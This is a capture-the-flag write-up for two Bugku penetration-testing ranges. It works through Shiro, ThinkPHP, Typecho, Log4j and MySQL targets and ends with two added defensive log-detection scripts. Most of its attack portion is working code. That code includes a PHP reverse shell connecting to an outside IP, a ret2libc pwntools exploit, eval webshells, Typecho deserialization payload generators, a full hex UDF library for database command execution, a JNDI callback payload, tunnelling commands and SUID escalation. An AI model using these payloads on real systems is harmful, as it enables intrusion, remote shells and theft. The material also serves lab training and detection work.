bugku - Penetration Testing

Penetration

Penetration Test 1

Go straight in with fscan

```text
fscan -h 139.224.31.84

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
139.224.31.84:8080 open
139.224.31.84:80 open
139.224.31.84:22 open
139.224.31.84:9999 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://139.224.31.84 code:200 len:59433 title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle http://139.224.31.84:8080 code:302 len:0 title:None 跳转url: http://139.224.31.84:8080/login;jsessionid=EEE3B21FC2D0B1790EF75A93F0828B6F
[*] WebTitle http://139.224.31.84:8080/login;jsessionid=EEE3B21FC2D0B1790EF75A93F0828B6F code:200 len:2608 title:Login Page
[+] PocScan http://139.224.31.84:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
```

flag7

A Shiro vulnerability was found, so start with Shiro. Inject a memory shell directly, then connect with Godzilla using the Java encryptor.

靶场/image-20241213135241255

靶场/image-20241213135324135

flag7 flag{799cf6022b49ac15aa88e3590997d657}

flag8

Use find for SUID privilege escalation

```bash
find / -user root -perm -4000 -print 2>/dev/null
find ./flag -exec cat /root/flag \; # a file named flag must exist in the current directory
```

靶场/image-20241213140243225

flag8 flag{70403e2f406168d19e602adc1541e1e0}

flag6

Found among the web service's files

靶场/image-20241213140530674

flag6 flag{eef5e1096042b0f026415e3b4d662235}

flag1

With this simple Shiro box done, let's look at port 80.

靶场/image-20241213140645612

Found in the page source

flag1 flag{a4358ce300cd7f2407541f9b55321b30}

flag2

As mentioned earlier, we need the site administrator, so we have to log in. We don't search for it with the earlier Shiro shell because Shiro actually runs on another machine with its port mapped through, so that is a different shell.

Use index.php/admin to redirect to the backend login

Weak password admin/admin

靶场/image-20241213142543795

Found

flag2 flag{49ba8b1119527af742f87f5ccbbf847f}

flag3

home was mentioned above, so the guess is that the flag is in the home directory.

First test with the online code-execution environment the site provides: commands can be executed

靶场/image-20241213141130209

```php
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[1]);phpinfo();?>')?>
```

The webshell was written successfully.

靶场/image-20241213142710668

flag3 flag{35a148014cce9eddeba72da4b7a9cd2a}

flag4

app/database.php

Database

靶场/image-20241213141959729

If the connection fails, try replacing localhost with 127.0.0.1

靶场/image-20241213142124692

flag4 flag{40eac9fa0469d8cecbcaaa1b0b753361}

flag5

We need to escalate to root.

It should be a very simple pwn; the port is the 9999 found in the initial scan

靶场/image-20241213142901417

I don't know pwn, so I found a script online

```python
from pwn import *
from LibcSearcher import *

context.log_level = 'debug'

r = remote('139.224.31.84', 9999)
elf = ELF('./main')  # local copy of the target binary

main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']
print(write_got)

ppp_ret = 0x08048559  # pop;pop;pop;ret gadget, cleans up write()'s three arguments

# Round 1: overflow, call write(1, write_got, 8) to leak write's libc address, then return to main
payload = b'A' * (0x24 + 4) + p32(write_plt) + p32(ppp_ret) + p32(1) + p32(write_got) + p32(8) + p32(main_addr)
r.sendlineafter(b'plz input your name:\n', payload)

write_addr = u32(r.recv(4))
print(hex(write_addr))

# Resolve the remote libc from the leaked address
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
print(hex(system_addr), hex(binsh_addr))

# Round 2: return into system("/bin/sh"); the 4 filler bytes are system's fake return address
payload = b'A' * 40 + p32(system_addr) + b'a' * 4 + p32(binsh_addr)
r.sendlineafter(b'plz input your name:\n', payload)

r.interactive()
```

This only works with a good network connection, otherwise the libc cannot be found

靶场/image-20241213155617180

flag5 flag{6a1e22502ab4d76ff794349a68a7dc5c}

Alternatively, use UDF privilege escalation

show global variables like '%secure%'; checks whether secure_file_priv is empty

靶场/image-20241213160043968

Then check the plugin location with show variables like 'plugin%'; which gives /usr/lib/x86_64-linux-gnu/mariadb18/plugin/

靶场/image-20241213160152120

select @@version_compile_os, @@version_compile_machine; shows the database architecture

靶场/image-20241213160339271

It is a 64-bit system; the matching payload can be looked up in "MySQL UDF 提权十六进制查询 | 国光"

SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de0100000000000079010000120000000000000
0000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e697
4007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004
883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488
b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028fafff
f030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000
000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b00000000000018000000000000000000000
0000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b00000000000000000000000000000001000000000000000000000000000000010000000300000000000000000000000000000
0000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb18/plugin/udf.so';

靶场/image-20241213160818783

Then load our file as a function library: CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';

靶场/image-20241213160909464

Verify with select sys_eval('whoami'); privilege escalation succeeded (the trailing ; does not seem to be required here)

靶场/image-20241213160931831
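Seen from the defender's side, the sequence above (a hex blob written with INTO DUMPFILE into plugin_dir, then CREATE FUNCTION ... SONAME, then a call to the new function) is easy to spot in the MySQL/MariaDB general log. The Python detector below is an added example, not part of the original writeup: it correlates the three statements per connection thread over a handful of constructed log lines in general-log format (time, thread id, command, argument). The plugin directory is the one the writeup found; the hex literal in the sample is abbreviated.

```python
import re
from collections import defaultdict

# Plugin directory reported by `show variables like 'plugin%'` in the writeup.
PLUGIN_DIR = "/usr/lib/x86_64-linux-gnu/mariadb18/plugin/"

# Constructed sample lines in MySQL general-log format: time, thread id, command, argument.
# The hex literal is abbreviated; a real UDF library is several kilobytes.
SAMPLE_LOG = """\
2024-12-13T08:01:02Z 12 Query show global variables like '%secure%'
2024-12-13T08:01:05Z 12 Query show variables like 'plugin%'
2024-12-13T08:01:10Z 12 Query SELECT 0x7f454c46 INTO DUMPFILE '/usr/lib/x86_64-linux-gnu/mariadb18/plugin/udf.so'
2024-12-13T08:01:20Z 12 Query CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'
2024-12-13T08:01:30Z 12 Query select sys_eval('whoami')
2024-12-13T08:02:00Z 13 Query SELECT title FROM posts WHERE id = 7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
DUMPFILE_RE = re.compile(r"INTO\s+DUMPFILE\s+'([^']+)'", re.IGNORECASE)
SONAME_RE = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'",
    re.IGNORECASE,
)
# Function names exported by the common lib_mysqludf_sys library.
UDF_CALL_RE = re.compile(r"\b(sys_eval|sys_exec)\s*\(", re.IGNORECASE)


def detect_udf_activity(log_text, plugin_dir=PLUGIN_DIR):
    """Return (alert_name, thread_id, detail) tuples for UDF-loading behaviour.

    Severity is 'high' when the same thread first wrote a file into the plugin
    directory and then registered a function from a library of that name.
    """
    written = defaultdict(set)  # thread id -> library names written into plugin_dir
    alerts = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m or m["cmd"].lower() != "query":
            continue
        tid, sql = m["tid"], m["arg"]

        d = DUMPFILE_RE.search(sql)
        if d and d.group(1).startswith(plugin_dir):
            name = d.group(1)[len(plugin_dir):]
            written[tid].add(name)
            alerts.append(("dumpfile_into_plugin_dir", tid, name))

        s = SONAME_RE.search(sql)
        if s:
            func, lib = s.groups()
            severity = "high" if lib in written[tid] else "medium"
            alerts.append(("create_function_soname", tid, f"{func}:{lib}:{severity}"))

        c = UDF_CALL_RE.search(sql)
        if c:
            alerts.append(("udf_command_exec_call", tid, c.group(1).lower()))
    return alerts


if __name__ == "__main__":
    for alert in detect_udf_activity(SAMPLE_LOG):
        print(alert)
```

In production the input would be the general log or an audit plugin feed rather than a string. The two conditions that made the write possible are also worth checking directly: secure_file_priv being empty and plugin_dir being writable by the database user.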

flag9

Time to move into the intranet; upload fscan and venom

靶场/image-20241213143606511

```bash
./fscan -h 192.168.0.2/24
```

```bash
cat r*
```

```text
192.168.0.4:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.1:22 open
192.168.0.3:8080 open
192.168.0.1:8080 open
192.168.0.4:3306 open
192.168.0.2:9999 open
192.168.0.1:9999 open
[*] WebTitle http://192.168.0.1:8080 code:302 len:0 title:None 跳转url: http://192.168.0.1:8080/login;jsessionid=78FEB49A0E6891DCC0E2D1473F60D56D
[*] WebTitle http://192.168.0.3:8080 code:302 len:0 title:None 跳转url: http://192.168.0.3:8080/login;jsessionid=2808B07F9D75465D20B48208B14C0AF8
[*] WebTitle http://192.168.0.1:8080/login;jsessionid=78FEB49A0E6891DCC0E2D1473F60D56D code:200 len:2608 title:Login Page
[*] WebTitle http://192.168.0.3:8080/login;jsessionid=2808B07F9D75465D20B48208B14C0AF8 code:200 len:2608 title:Login Page
[*] WebTitle http://192.168.0.2 code:200 len:59431 title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle http://192.168.0.1 code:200 len:59431 title:W3School教程系统 | 打造专一的web在线教程系统
[*] WebTitle http://192.168.0.4 code:200 len:8351 title:博客首页
[+] PocScan http://192.168.0.1:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
[+] PocScan http://192.168.0.4 poc-yaml-thinkphp5023-method-rce poc1
[+] PocScan http://192.168.0.3:8080/ poc-yaml-shiro-key [{key kPH+bIxk5D2deZiIxcaaaA==} {mode cbc}]
```

Analysis of the targets:

192.168.0.1|192.168.0.2 external hosts

192.168.0.3 shiro

192.168.0.4 tp (ThinkPHP)

So ThinkPHP is next. Use a PHP file to get a reverse shell

```php
<?php
$ip='8.130.44.169';
$port='2333';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
```

Then run php a.php. Success

靶场/image-20241213144049362

Attacker machine: ./admin_linux_x64 -lport 9999

Target: ./agent_linux_x64 -rhost 156.238.233.55 -rport 9999

As shown

靶场/image-20241213144253219

Access successful

靶场/image-20241213144419293

fscan already found the ThinkPHP vulnerability, so an Nday exploit is enough. It kept reporting a blacklist, though; a tool got a shell successfully

靶场/image-20241213151332070

靶场/image-20241213151316274

flag9 flag{9fe15913cfa6bc74bfead5e23eea3f7b}

flag10

It says the flag is in the database

靶场/image-20241213151455242

Just connect directly

靶场/image-20241213152908763

flag10 flag{f83d26a275cb68a39b1d9d1b841d9144}

flag11

Escalate with PwnKit; the SUID bit on pkexec is what suggested trying PwnKit

靶场/image-20241213153222282

flag11 flag{110ee31030ae9e0ebc0b443fa74fdf8e}

Penetration Test 2

flag1

Started with an fscan scan and found nothing; forgot to take a screenshot.

Wappalyzer shows the blog framework is Typecho

靶场/image-20241213091958257

There is an Nday for it: [漏洞复现]typecho_v1.0.14反序列化漏洞_typecho 1.0.14-CSDN博客

```php
<?php

class Typecho_Feed{
    private $_type;
    private $_items = array();

    public function __construct(){
        $this->_type = "RSS 2.0";
        $this->_items = array(
            array(
                "title" => "test",
                "link" => "test",
                "data" => "20190430",
                "author" => new Typecho_Request(),
            ),
        );
    }
}

class Typecho_Request{
    private $_params = array();
    private $_filter = array();

    public function __construct(){
        $this->_params = array(
            "screenName" => "eval('phpinfo();exit;')",
        );
        $this->_filter = array("assert");
    }
}

$a = new Typecho_Feed();

$c = array(
    "adapter" => $a,
    "prefix" => "test",
);

echo base64_encode(serialize($c));
// taken from https://www.cnblogs.com/litlife/p/10798061.html
```

Remember to add the Referer header; the value of **__typecho_config** is our payload

靶场/image-20241213092538562

Writing a webshell kept failing, so I borrowed someone else's exp here

```php
<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();
    public function __construct(){
        $this->_params['screenName'] = 'echo "<?php phpinfo();@eval(\$_POST[1]);?>" > shell.php';
        $this->_filter[0] = 'system';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>
```

靶场/image-20241213093257280

flag1:flag{583679f6bc484f79e4dc2ca757f360de}

flag2

The database credentials are in config.inc.php.

靶场/image-20241213094136531

Found flag2: flag{aabc736dbbcec82f5a5d967ee34cb6ad}

靶场/image-20241213094152242

flag4

Since neither wget nor curl is available, upload fscan and venom directly with AntSword

靶场/image-20241213094805186

Scan the /24

```bash
./fscan -h 192.168.0.2/24
```

AntSword's terminal is a virtual one, so there is no live output; we have to cat result.txt ourselves

```text
192.168.0.1:80 open
192.168.0.2:80 open
192.168.0.3:80 open
192.168.0.1:22 open
192.168.0.2:3306 open
[*] WebTitle http://192.168.0.2 code:200 len:3392 title:Harry's Blog
[*] WebTitle http://192.168.0.1 code:200 len:3392 title:Harry's Blog
[+] mysql 192.168.0.2:3306:root
[*] WebTitle http://192.168.0.3 code:200 len:4789 title:Bugku后台管理系统
```

Set up the proxy.

```bash
./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost 156.238.233.55 -rport 9999
```

When logging in to 192.168.0.3, source.zip shows up in the response headers

靶场/image-20241213101041242

After downloading it, it turns out to be a log4j application

靶场/image-20241213101403969

Not sure why the extra 55 in the white box appears here

靶场/image-20241213102057808

Use the payload from the springboot challenge

靶场/image-20241213102139359

```text
${jndi:rmi://156.238.233.55:1099/fjudpl}
```

Reverse shell obtained

靶场/image-20241213102206366

flag{34631421c7b4c1f0a2267b5391be5897}
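A defender's view of the same step: the lookup string has to arrive in some request field that Log4j ends up logging, so it is visible in the web server's access log. The Python scanner below is an added example, not from the original writeup; it parses a few constructed combined-format lines, URL-decodes the request line, Referer and User-Agent, and reports the literal `${jndi:` form. It assumes the combined log format, and 203.0.113.5 is a documentation address standing in for a callback host.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). Only the first line is benign;
# the others carry the lookup in the User-Agent, the query string (URL-encoded) and the Referer.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [13/Dec/2024:10:20:01 +0000] "GET /login HTTP/1.1" 200 2608 "-" "Mozilla/5.0"
192.0.2.11 - - [13/Dec/2024:10:21:39 +0000] "GET /login HTTP/1.1" 200 2608 "-" "${jndi:rmi://203.0.113.5:1099/fjudpl}"
192.0.2.12 - - [13/Dec/2024:10:22:02 +0000] "GET /login?user=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1" 200 2608 "-" "curl/8.0"
192.0.2.13 - - [13/Dec/2024:10:23:15 +0000] "POST /api HTTP/1.1" 200 12 "${JNDI:dns://203.0.113.5/x}" "python-requests/2.31"
"""

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# The plain Log4j lookup prefix; case-insensitive because the lookup name is.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def find_jndi_lookups(log_text):
    """Return (client_ip, field, decoded_value) for each client-controlled field
    that contains a literal JNDI lookup after URL-decoding."""
    hits = []
    for raw in log_text.splitlines():
        m = COMBINED_RE.match(raw)
        if not m:
            continue
        for field in ("request", "referer", "ua"):
            decoded = unquote(m[field])
            # decode a second time so a double-encoded payload is caught as well
            if JNDI_RE.search(decoded) or JNDI_RE.search(unquote(decoded)):
                hits.append((m["ip"], field, decoded))
    return hits


if __name__ == "__main__":
    for ip, field, value in find_jndi_lookups(SAMPLE_ACCESS_LOG):
        print(f"{ip} {field}: {value}")
```

This catches only the plain lookup syntax and is a first-pass filter for triage, not a complete detector; the actual fix is upgrading Log4j to a release with the JNDI lookup disabled or removed, and egress filtering so the application host cannot reach arbitrary LDAP/RMI ports.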

flag3&flag5

Reading start.sh reveals the flag locations

靶场/image-20241213102404664

